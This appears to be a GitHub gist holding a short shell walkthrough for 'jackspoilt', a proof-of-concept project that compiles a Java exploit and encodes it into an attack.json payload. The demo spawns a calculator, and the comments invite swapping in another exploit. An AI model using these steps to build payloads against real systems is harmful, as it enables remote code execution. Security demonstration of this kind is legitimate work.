Last active
May 6, 2018 13:57
-
-
Save conikeec/d944db7ab5ab2f2e8eec39f472a2b06f to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
cd jackspoilt | |
# create the exploit by editing ./master/exploit/Exploit.java | |
# current version adds errros to log and spawns a calculator on OSX | |
# (For Linux based OS please revise the line to specify an exploit of your choice) | |
# compile ./master/exploit/Exploit.java | |
mvn exec:java -D"exec.mainClass"="EncodeExploit" | |
# The command above creates attack.json in the attackscripts directory | |
more attackscripts/attack.json |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment